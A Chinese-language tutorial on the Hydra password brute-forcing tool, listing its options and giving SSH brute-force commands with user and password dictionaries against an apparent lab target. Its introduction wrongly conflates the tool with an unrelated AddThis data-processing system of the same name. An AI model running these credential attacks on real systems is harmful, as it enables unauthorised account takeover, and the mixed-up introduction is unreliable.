暴力破解工具-hydra使用_hydra -w

一、hydra简介：

ydra（九头蛇），分布式任务处理系统，由社交标签服务提供商AddThis六年前开发，现在已得到Apache的开源许可，就像Hadoop一样，只是还没有Hadoop那样的知名度和声势。Hydra的创造者称，该“多头”平台非常擅长处理一些大的数据任务——对非常大的数据集进行实时处理。

hydra 是一款世界顶级密码暴力破解工具，支持几乎所有的协议的在线破解，功能强大，其密码能否被破解关键取决于破解字典的是否足够强大，在网络安全绳头过程中是一款必备的测试工具。

二、hydra简单的使用。

hydra -l  指定用户名  

hydra -L 制定user文件。

hydra -p 指定密码。

hydra -P 制定密码文件

hydra -M 指定要攻击服务列表，“：”后面跟端口

hydra -S 指定ssl连接

hydra -s 如果不在默认端口就要指定使用-s指定端口

bydra -e 尝试密码为空

bydra -u 循环使用用户

bydra -C 使用文件内login：pass 分隔。

bydra -c 在所有线程上每次登录尝试的等待时间

hydra  -o 将找到的登陆/密码写入文件

hydra -b 指定-o文件类型

hydra -t  运行任务每个目标并行连接的数目（默认值：16）

hydra -w/-W 每个线程的连接之间响应（32）/的等待时间（0）

hydra使用步骤

1.指定用户以及密码破解

hydra -l root -p owaspbwa 192.168.72.142 ssh

2.我们指定密码字典，进行破解，建立密码字典

使用hydra进行破解

hydra -l root -P passlist.txt 192.168.72.142 ssh

3.指定用户字典进行破解

建立用户字典uesrlist.txt

命令进行破解

hydra -L userlist.txt -P passlist.txt 192.168.72.142 ssh

4，将破解的users与pssword写入文件

hydra -L userlist.txt -P passlist.txt 192.168.72.142 ssh -o id.txt

5.使用-M 进行服务器文件的读取

我们服务器列表文件 server.txt

使用命令进行破解

hydra -L userlist.txt -P passlist.txt -M server.txt ssh -o id.txt

6，同时我们也可以使用-t设置线程数

 hydra -L userlist.txt -P passlist.txt -M server.txt ssh -o id.txt -t 10